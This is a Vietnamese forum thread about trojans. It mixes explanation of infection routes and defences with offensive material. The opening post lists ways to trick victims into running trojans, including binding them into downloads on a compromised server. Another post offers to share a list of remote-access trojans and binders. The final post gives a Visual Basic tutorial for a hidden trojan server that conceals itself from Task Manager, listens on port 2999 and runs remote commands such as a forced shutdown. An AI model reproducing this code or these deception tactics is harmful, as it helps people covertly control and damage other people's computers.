orbitvn

Trojans

Bài này được tôi thu thập từ nhiều nguồn trên mạng, rồi tôi viết lại để mọi người có thể dễ hiểu hơn. Hi vọng mấy pác có thêm kiến thức sau bài này. Tôi mong càng nhiều người đọc càng tốt.

1. Thế nào là trojan ?

Trojan là :

+ Một chương trình bất hợp pháp được chứa bên trong một chương trình hợp pháp. Chương trình không hợp pháp này thực hiện những hàm bí mật mà người dùng không biết hay không cần đến. Về chức năng của trojan, tôI sẽ đề cập đến trong phần sau.

+ Trojan cũng có thể cũng được gọi lŕ một con chuột hay là những công cụ Quản trị Từ xa.

+ Trojan có tên từ một câu chuyện thần thoại cũ về những người Hi Lạp trong thời gian chiến tranh, họ đã tặng cho kẻ thù của mình một con ngựa làm bằng gỗ khổng lồ. Kẻ thù của những người Hi Lạp chấp nhận quà tặng này và họ mang vào trong thành, và ngay trong đêm đó, những người lính tiếng Hy-Lạp chui ra khỏi con ngựa và tấn công thành phố, hoàn thành việc đánh chiếm thành

2. Trojan ngày nay

_ Ngày nay, trojan luôn luôn là vấn đề lớn trong bảo mật và an toàn trên mạng.

_ Nhiều người không biết Trojan là gì và họ tải xuống những file mà không biết rõ nguồn gốc.

_ Hiện nay, tôi được biết có hơn 1000 Trojan vŕ tôi biết rằng vẫn còn rất rất nhiều nữa, vì mỗi Hacker, lập trình viên hay mỗi nhóm Hacker đều viết trojan rięng cho mình và những con trojan này sẽ không được công bố lên mạng cho đến khi nó bị phát hiện..

_ Khi một người nào đó bắt đầu học "Winsock", đầu tięn họ tạo ra một chương trình chat hay một con trojan. Thậm chí một chuyên viên antivirus cũng có thể bị nhiễm trojan của chính mình, hay của một hacker nào đó .

3. Chương trình chống virus

_ Nhiều người nghĩ rằng khi họ có một chương trình quét virus tốt và có bản cập nhật mới nhất thì họ sẽ an toàn, máy họ sẽ không bị nhiễm trojan hay không ai có thể truy cập máy tính của mình. Ðiều này hoàn toàn sai. Mục đích của những viết chương trình chống virus là phát hiện ra những virus mới chú không phải là những con trojan. Nhưng khi những con trojan được nhiều người biết đến thě những chuyên viên chống virus sẽ nạp thêm nó vào trong chương trình quét của mình. Tôi đã nói tôi biết đến 1000 trojan, và tôi biết đến 1000 con trojan này từ mạng, từ những chương trình quét virus nhưng đây chỉ là một phần rất nhỏ mà những chuyên viên anti-virus phát hiện được.

_ Những chương trình quét virus này không phải là firewalls, nó sẽ không phát hiện ra trojan và bảo vệ bạn trong khi bạn đang trên mạng

_ Hầu hết người dùng Internet chỉ biết đến Back Orifice và NetBus chỉ là những trojan.

Có vài công cụ đặc biệt trên mạng sẽ quét sạch những con trojan được công bố này, và một lần nữa, người dùng nghĩ rằng họ được bảo vệ khỏi bất kỳ trojan nào

4. Tôi bị nhiễm trojan như thế nào ?

Mọi người hỏi câu hỏi này và mọi người cũng cố gắng tự tìm cho mình câu trả lời nhưng hầu hết họ không thành công. Bởi vì có khi một chuyên viên hỏi bạn có tải xuống, hay chép file từ đâu đó không thě 90% trả lời là không, nhưng thực sự họ đã làm điều đó trước đó vŕi ngày.

Bạn có thể bị nhiễm trojan từ rất nhiều nguồn và Tôi sẽ thử giải thích vd cho bạn từ những nguồn dưới đây :

4.1 Từ ICQ

4.2 Từ IRC

4.3 Từ files đính kèm trong mail

4.4 Truy cập trực tiếp

4.5 Mánh khóe.

< -------------------------------------------- >

4.1 . Từ ICQ

Mọi người biết ICQ không an toàn như thế nào vì vậy một số người sợ sử dụng nó.

Nhưng nhiều người lại nghĩ rằng trojan không thể lây lan trong khi họ đang nói chuyện trên ICQ nhưng họ quên là người đang nói chuyện có thể gửi cho họ một chú Trojan.

Có thể bạn biết đến ICQ có một bug cho phép bạn để gửi một file .exe tới người nào đó nhưng người nhận nhìn như có vẻ bạn đang gửi cho họ file hình ảnh, âm thanh.... VD có người nào đó sẽ thay đổi biểu tợng cũa file .exe thŕnh file .bmp, và nói với bạn rằng đây là hình của anh ta. Bạn sẽ download nó về và bum bum bum !!! Nhưng nếu người gửi file ngu ngốc đổi tên file .exe thành .bmp thì bạn đã an toàn, vì khi file .exe đổi tên thành .bmp thì file .exe không thể thực hiện. Nhưng khi file gửi đến bạn đúng lŕ một con trojan đuợc kẹp chung với file hěnh ảnh và người gửi đă thay đổi icon của file .exe, bạn sẽ chạy con trojan đó vŕ không hể nghi ngờ, vì khi chạy file .exe đó, nó vẫn hiện lên hình ảnh của một ai đó. Ðó là lý do hầu hết người dùng nói rằng họ không chạy bất kỳ file nào trong khi họ đã lỡ lầm

Một cách để ngăn ngừa bug này trong ICQ là bạn luôn luôn kiểm tra kiểu file trước khi chạy nó. Và bạn đã sai lầm khi bỏ qua giai đoạn kiểm tra và chạy ngay file khi có người gửi đến.

4.2 Từ IRC

Giống trên, cũng bằng cách đánh lừa bạn nhận trojans để bạn chạy nó

4.3 Từ mail

Chác bạn cũng biết có rất nhiều trojans, virus được lây lan bằng mail, và tốc độ lây lan của nó rất nhanh. Một cách đơn giản vŕ thờng dùng là trojan sẽ lấy địa chỉ mail trong adress book để phát tán cho những người bạn của bạn. Ngay bây giờ, bạn hăy cài ngay chương trình nào có thể kiểm tra mail trước khi download về và kiểm tra những mail được send ra ngoài ( Bkav 2000 )

4.4 Truy cập trực tiếp

Khà khà, bạn chuyên nghiệp, bạn có chương trình chống trojan tốt nhất, bạn download file ở bất kỳ đâu, kể cả người bạn thân nhất của mình gửi. Bạn an toàn . Nhưng không có gì nguy hiểm hơn khi có kẻ địch từ bên trong đánh ra. Hèm, bạn của bạn đến nhà chơi, tranh thủ lúc bạn đi pha nước chẵng hạn, bạn của bạn nhanh chóng mở máy , chưa đầy 5 phút máy của bạn sẽ ngập trong biển trojan.

4.5 Mánh khóe

Bạn thích xxx, bài @hắc căn bản hay bất kỳ tài liệu nào đó bạn xin mãi thằng bạn nhưng nó không cho, bỗng một hôm đẹp trời nào đó, bỗng nó cho bạn, thờng bạn mở ra và chạy file đó ngay mà không kiểm tra, khi không đúng tài liệu bạn cần, bạn sẽ nghi ngờ và kiểm tra, phát hiện nó là trojan, nhưng khi đã đạt được mục đích thì ít ai kiểm tra xem file đó có đính kèm gì hay không.

Trên đây chỉ là một VD nhỏ, và tôi không thể để cập đến tất cả mánh khóe được.

5. Trojan nguy hiểm như thế nào?

_ Nhiều người, không biết trojan là gì thì nghĩ rằng khi chạy chúng,họ không thấy đIều gì xảy ra, và họ nghĩ rằng trojan không có gì nguy hiểm, bởi vì máy tính của họ vẫn làm việc và tất cả dữ liệu vẫn còn đó ,nếu đó là một con virus thì dữ liệu đã có thể mất sạch hay máy đã ngưng hoạt động.

_ Khi máy bạn bị nhiễm trojan, tất cả dữ liệu trên máy đều có thể bị nguy hiểm,thường thì hacker không xóa tất cả hồ sơ này mà họ sẽ chép về khai thác như tài liệu bí mật của công ty, tài khoản internet, credit card và khi không có gì khai thác, có thể hacker xóa sạch dữ liệu của bạn. ÐôI khi hacker còn dùng trojan để càI đặt virus phá hoại như CIH chẵng hạn . Ðó là một vài VD hacker có thể thực hiện khi họ đã càI thành công trojan.

6. Thế có bao nhiêu loại trojan ?

_ Có rất nhiều trojan, nhưng chủ yếu nó được chia ra lŕm các dạng căn bản sau :

6.1 Trojan dùng để truy cập từ xa

Hiện nay, trojan loại này được sử dụng rất nhiều. Chức năng chính của trojan nŕy là mở một cổng trên máy nạn nhân để hacker có thể quay lại truy cập vào máy nạn nhân.

Những con trojan này rất dễ sử dụng. Chỉ cần nạn nhân bị nhiễm trojan và hacker có IP của nạn nhân thì hacker đã có thể truy cập toàn quyền trên máy nạn nhân

Tùy loại trojan mà chức năng của nó khác nhau ( keylogger, download, upload file, thực hiện lệnh .. ) bạn phảI đọc kỹ hớng dẫn để sử dụng hiệu quả tất cả chức năng của nó.

Hiện có nhiều con nổi tiếng loai này như : netbus, back orifice ...

6.2 Keylogger

Con này đã quá quen thuộc với bạn, nó ghi lại tất cả hành độnh trên bàn phím rồi gửi về cho hacker khi nạn nhân online.

Vd : kuang keylogger ..

6.3 Trojan gửi mật khẩu

Ðọc tất cả mật khẩu lưu trong cache và thông tin về máy nạn nhân rồi gửi về cho hacker mỗi khi nạn nhân online.

Vd : barok, kuang, bario ..

6.4. Trojan phá hủy

Loại trojan này rất dễ sử dụng

Những con trojan này chỉ có một nhiệm vụ duy nhất là giết giết giết, tiêu diệt tiêu diệt tiêu diệt tất cả file trên máy bạn ( VD file .exe, .dll, .ini .... )

Những con trojan này rất nguy hiễm vì khi máy bạn bị nhiễm chỉ một lần thôI thì tất cả dữ liệu mất sạch sành sanh, chả còn cái gì cả

Vd : Trojan loại này con nít lên 3 cũng biết viết, khỏi cho VD.

6.5 FTP trojan

Loại trojan này sẽ mở cổng 21 trên máy của bạn và để cho tất cả mọi người kết nối đến máy tính của bạn mà không có mật khẩu và họ sẽ toŕn quyền tải bất kỳ dữ liệu nào xuống

< ------------------- >

Đây là những loại trojan chung, hay được sữ dụng nhất. Và bạn hăy cẩn thận khi sử dụng chúng kẻo chơi dao đứt tay

7.Thế hacker tìm kiếm những gì trên máy của tôi. ?

Nhiều người nghĩ rằng hacker dùng trojan chỉ để phá hoại máy của họ, điều đó hòan toàn sai lầm. Trojan là một điệp viên rất hữu hiệu giúp hacker tìm được rất nhiều thông tin trên máy của nạn nhân. Họ có thể tìm kiếm những thông tin sau :

+ Thông tin về Credit Card,

+ Tìm kiếm thông tin về account của bạn trên server

+ Account của bạn trên server khác

+ Dữ liệu bí mật

+ Danh sách địa chỉ mail ( các spammer rất khoái cái này )

+ Ðịa chỉ nhà riêng của ai

+ Account Passwords

+ Thông tin về khách hàng của bạn

+ Tất cả những thông tin cơ mật công ty của bạn

.. . . . . . . . . . . . . . .

Nói chung là rất nhiều, cái gì đáng giá, đáng khai thác là lấy

8. Thế trojan hoạt động như thế nào ?

Hừ đọc mỏi cả mắt mà chẳng biết trojan nó hoạt động thế nào cả

Từ từ, đừng nóng tôi sẽ giải thích ngay đây.

Khi nạn nhấn chạy file nhiễm trojan, nếu là trojan truy cập từ xa ( remote access ), file server sẽ luôn ở chế độ chờ. Nó sẽ chờ, chờ mãi cho đến khi nó nhận tín hiệu của client , ngay lập tức nó sẽ mở ngay một cổng nào đó để hacker có thể truy cập vào. Nó có thể sử dụng TCP hay nghi thức UPD.

Khi bạn kết nối vào IP của nạn nhân, bạn có thể làm bất kỳ điều gì bạn muốn vì con trojan đã bao hàm những lệnh trên.

Một vài trojan được nạp ngay khi Windows được khởi động bằng cách sửa file win.ini, system.ini hay sửa registry

9. Làm sao lừa victim

Bạn không thể gửi khơi khơi một con trojan rồi kêu nạn nhân nó chạy được, gặp thằng ngu thì mới chạy. Vì vậy có vài thủ thuật sau :

+ Dùng Godwill, Godmessage để lưu trojan vào trong mail, trang web. Khi nạn nhân mở mail,trang web thì sẽ tự động bị nhiễm trojan

+ Nhập file trojan vào trong một chương trình. Có rất nhiều công cụ được sử dụng như bind, joiner .... bạn có thể download nó ở tlsercurity.net

+ Cách thâm độc do tui nghĩ ra : @hắc một server download file quan trọng, uy tín, nhiều người důng, nhập file trojan vào trong những file này và hehe tha hồ mà kiếm nạn nhân. bây giờ @hắc được yahoo, google thì hộp thư bác chắc nhóc địa chỉ victim luôn. hì hì

+ Vào ICQ, MIRC dụ vài con cừu non.

+ Phản bạn, vào máy nó mà cài trojan hay dụ nó chạy file của mình

. . . . . . . . . .

10. Hic thế làm sao em có thể bảo vệ được máy mình đây ?

Như đă nói ở trên, bạn đừng tởng mình đã có chương trình chống virus, scan trojan là an toàn có thể thoát khỏi trojan, rất khó để thoát khỏi trojan. Nhưng chẵng lễ không bảo vệ, đIếc rồi hông sợ súng, không, vẫn có nhiều cách chống trojan thông thờng, tuy đơn giản nhưng rất hiệu quả .

+ Sử dụng những chương trình chống virus, trojan mới nhất của những hãng đáng tin cậy ( AVP, Mscafe .. .)

+ Mỗi khi bạn tắt máy, trojan cũng tắt và nó sẽ khởi động lại ngay khi máy đang load windows. Nó không tự dưng chạy mà nó phảI sửa file win.ini, system.ini hay lưu vao trong registry. Vì thế bạn phải luôn lôn kiểm tra những file này. Công cụ sử dụng tốt nhất trong win 98là msconfig. Ban chỉ cần vào RUN và gõ : MSCONFIG. Thường thì nhiều trojan hay được lưu trong thư mục \windows hay \windows\system

+ Nhiều trojan không thể dấu được khi bạn nhấn Ctrl+Alt+Del, lâu lâu thử nhấn 3 phím này và kiểm tra xem có gì lạ không.

+ Sử dụng những chương trình scan port xem máy mình có mở cổng nào lạ không, nếu nó không nằm trong những cổng thông thường hay nằm trong những cổng liệt kê trên thì bạn biết chắc rằng máy bạn đã bị nhiễm trojan.

+ Không download file từ những nguồn không rõ hay nhận mail của người lạ, Tốt nhất là dùng chương trình check mail ngay trên server, thấy an toàn rồi mới load về.

+ Sử dụng một số chương trình có thể quan sát máy của bạn và lập firewall như lockdown, log monitor, PrcView . . . .

+ trước khi chạy file lạ nào, kiểm tra nó trước.

__________________

Sau thời gian lên núi luyện công ( ý nhầm nghỉ ngơi). Orbitvn xin được phép trở lại. Mong được sự ủng hộ của các bạn.

boyngugat0it

Mình có rất nhiều Trojan,loại cũ thôi như:

Poison Ivy 2.3.0 1,6 MB
BIFROST Troyano Bifrost v1.2 0,6 MB
BIFROST Troyano Bifrost v1.102 0,8 MB
APOFIS Apofis 1.0 (Troyano por Web) 0,4 MB
FLUX Troyano Flux V1.01 Pack 2,9 MB
ProRAT ProRat v1.9 3,2 MB
BEAST Beast 2.07 0,7 MB
Optix Optix Pro v1.1 1,2 MB
Optix Optix Pro v.1.32 1,1 MB
assAsin Assasin v 2.0 5,4 MB
assAsin Assa*SIN* v1.1 0,7 MB
netdevil Net-Devil 1.5 1,1 MB
mosucker Mosucker v3.0b3 2,7 MB
bionet Bionet v4.0.5 1,3 MB
DARKMOON Dark Moon Server V1 0,1 MB
Insurec Insurrection v1.0 1,8 MB
Taladrator Taladrator 2003 (Troyano Español) 1,2 MB
skanner Troyano hacktool 0,3 MB
turktrojan Turkoyan v1.0 (Troyano Turco) 1,8 MB
fx Fx v1.1. 0,5 MB
cs-trojan CS Trojan 0,6 MB
remote-ad R.A.S. 2002 v1.0. 0,02 MB
cyn Cyn v2.1 0,9 MB
nexus Nexus Portal v3.5 0,6 MB
koko Koko Trojan v2.0 0,3 MB
MParadise Master's Paradise 98 Beta 9.7 N.D
Netbus-peta Busca y peta el netbus 0,2 MB
Netbus-fuck NetBus Fucker 0,001 MB
Netbus Netbus Pro v2.01 1,7 MB
Netbus Netbus Pro v2.1 1,9 MB
S7CRACk Crackeador de los passwords del troyano Subseven 2.2 0,2 MB
Subseven Subseven v2.2 2,7 MB
Subseven Sub Seven v2.1.0 1,3 MB
Subseven SubSeven v2.1.1 Gold 1,4 MB
Subseven Sub Seven v2.1.2 Muie 1,6 MB
Subseven Sub Seven v2.1.3 Bonus 1,36 MB
Subseven Sub Seven 2.1.4 Defcon 8 Edition 1,34 MB
Subseven Sub Seven 2.1.5 Legends 1,3 MB
Subseven Sub Seven v2.2.0 2,8 MB
lwclient LiTTLeWiTCH Cliente v6.3 0,9 MB
lwserver LiTTLeWiTCH Server (Actualizado 16-4-03) 0,36 MB
lwplug LiTTLeWiTCH Plug-in para Capturar Pantallas 0,85 MB
Ptakks Ptakks v2.1 0,4 MB
bo Back Oriffice v1.2 N.D
bo Cliente del BO en Español 0,3 MB
fst Faceless Stealth Tools v1.2 0,2 MB
radmin Remote Administrator v2.1

Ngoài ra còn có các Binder như:

KIMS 1.1 (scanear con varios antivirus) 0,6 MB
Astaroth Astaroth Joiner v1.0 0,4 MB
KILLER Killer Offsets 1.1 0,4 MB
REDBINDER RedbindeR 2.0 0,4 MB
IPACKER IPacker Tool (Joiner) 0,2 MB
eesbinder EES Binder 1.0 20 KB
frehbind Freshbind 2.0 10 KB
calimocho Calimocho Joiner 0,2 MB
multibinder Multibinder1.4.1 a 0,2 MB
Interlaced Interlaced v1.00 0,2 MB
juntador Juntador (binder) 0,6 MB
yab YAB v2.0 (binder) 0,4 MB
deception Deception Binder 3.0 0,6 MB
zombies Zombie's Joiner v2.5 (Binder) 0,2 MB
yab YAB v2.0 (Binder) 0,4 MB
radmin Remote Administrator 2.1(Mirror) 1,3 MB

Hồi trước down về để nghịch thử,bạn nào muốn lấy để nghịch thì nói nha,tất nhiên chỉ để tìm hiểu thôi chứ it bây giở cứ KAS,KIS update ầm ầm thì chúng chỉ là "con tép trên mép con mèo",ngay cả mình mỗi khi muốn nghịch đều phải tắt KIS đi không thì nó quét hết cả "ngựa gỗ" mất.

__________________

Ping girls：Request timed out
Ping money：Destination unreachable；
Ping Love：Unkown host name
Ping Future：Reply from hell：year=0

The_Angel

hay đấy rất hiểu ích cho mình hỏi lun hôm qua mnình chỉ lướt web và chới cf trong thời gian khoang 4 h ma ko hiểu sao nó lại lên đến 500 mb à sao đây

__________________
tải truyện comic.vuilen.com 100kb/s

[bài này hay lắm nè honey 2 (hem virus nha)
trạng nguyên thời @

orbitvn

Bạn coi có chương trình nào hoạt động trong process không hoặc kiểm tra trojan theo cách ở trên nha.

__________________

Sau thời gian lên núi luyện công ( ý nhầm nghỉ ngơi). Orbitvn xin được phép trở lại. Mong được sự ủng hộ của các bạn.

somethings

Cho mình hỏi nếu lở tải file có trojan trong đó rồi, vậy phải làm sao để tiêu diệt và tiêu diệt nó?
Còn khi nhấn ctr+alt+del thì mình xem ở đâu Applications, Processes, Services, Performance, Networking, Users thì biết là có trojan?

nmhu

Trong processes thôi, còn mấy cái kia ko có gì đâu. ( Chú thích nhỏ : Bạn có xem đi nữa cũng chẳng tìm thấy đâu ) .
Tốt nhất là nên sử dụng chương trình diệt virus mạnh như : Kaspersky, Bitdefender ,..., và luôn cập nhật các chương trình đó thường xuyên.
Còn đối với trojan đến từ việt nam thì chỉ có BKAV là tốt nhất , nên tin tưởng vào hàng Việt .

nmhu

Còn đây dành cho những ai thích viết trojan, và đang muốn tìm hiểu về nó. Nếu ai đọc rồi thì đừng chê nha, còn những ai chưa đọc thì vào đây đọc thử.
Tôi đăng bài này không phải mục đích khuyến khích các bạn viết virus phá hoại dữ liệu người dùng mà chỉ muốn qua bài viết này các bạn có thể hiểu biết một phần nào đó về cách xây dựng một virus. Qua đây các bạn cũng có thể xây dựng các ý tưởng về một phần mềm chống virus khi chúng ta biết rõ đường đi của một virus mạng.
Viết một Trojan dễ dàng hơn nhiều so với mọi người nghĩ. Tất cả thực sự chỉ cần hai chương trình ứng dụng đơn giản với nội dung ít hơn 100 dòng mã lệnh.

Chương trình đầu tiên là client, là chương trình cho người sử dụng biết. Chương trình thứ hai là server, hay phần “trojan” thực.

Bây giờ chúng ta sẽ xem chúng ta cần gì cho cả hai và một số ví dụ mẫu.

Server

Server là phần Trojan của chương trình. Nó cần phải được giấu để người dùng bình thường không thể tìm thấy nó.
Để thực hiện điều này bạn bắt đầu bằng cách sử dụng đoạn mã lệnh sau:
Private Sub Form_Load()
Me.Visible = False
End Sub
Đoạn mã này làm cho chương trình không thể thấy được bằng mắt thường nhưng có thể bị phát hiện trong Task Manager của Windows vì thế nếu muốn chương trình ẩn tốt hơn, chúng ta có thể viết đoạn mã như sau:

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub
(Trong hệ điều hành Windows, tất cả chương trình có đuôi .exe đều được thể hiện trong danh sách chương trình chạy. Tuy nhiên chương trình của bạn sẽ được ẩn trong Running Applications List )

Bây giờ chúng ta đã có một chương trình tàng hình đối với người sử dụng bình thường, mà chỉ cần có bốn dòng lệnh. Tuy nhiên nó vẫn còn quá đơn giản, chúng ta có thể làm cho nó tốt hơn bằng cách thêm vào một số hàm.

Đầu tiên là làm sao cho nó có thể “nghe” được các kết nối khi nó xâm nhập được vào máy, chúng ta cần thêm vào một điều khiển Winsock Control.

Tôi đặt tên cho điều khiển của tôi là “win”. Còn các bạn có thể đặt là bất cứ cái gì tuỳ ý.

Để làm cho Trojan "nghe" được cổng 2999 khi khởi động, chúng ta viết đoạn mã như sau:
Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub
Đoạn mã này thiết lập một cổng mở cục bộ tới cổng 2999, và cổng mà nó gửi tới là 445.

Bây giờ, chương trình đã có thể “nghe”, nhưng chưa làm được điều gì rõ ràng cả.

Chúng ta thêm đoạn mã sau vào form chính:
Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub
Tiếp theo, chúng ta sẽ viết hàm DoActions như là một chương trình con để gọi vào main form. Đoạn mã trên thực hiện hai nhiệm vụ: Đầu tiên là làm cho tất cả các yêu cầu kết nối được tự động chấp nhận; tiếp đó là làm cho tất cả các dữ liệu được tự động chấp nhận và sau đó thì chuyển toàn bộ dữ liệu này sang cho hàm DoActions mà chúng ta sẽ viết dưới đây.

Hàm DoActions nên viết ở dạng public để các chương trình ở ngoài modul cũng có thể dùng được. Thêm đoạn mã sau vào modul, và chúng ta đang làm việc với server của Trojan:
Public Function DoActions(x As String)
Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"
Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function
Bây giờ bạn đã có một chương trình mà khi dữ liệu “Msgbox” được gửi tới cổng 2999, nó sẽ thể hiện một hộp tin nhắn msgbox trên máy tính của nạn nhân. Khi dữ liệu “shutdown” được gửi tới cổng 2999, nó sẽ tắt máy tính của nạn nhân. Tôi dùng câu lệnh “Select Case” để dễ dàng chỉnh sửa đoạn mã về sau này. Xin chúc mừng, bạn vừa mới viết xong Trojan đầu tiên của bạn.

NẾU HAY THÌ " THANK " NHA. Và sao ko thử thể hiện khả năng của mình viết một chương trình chống lại con trojan này.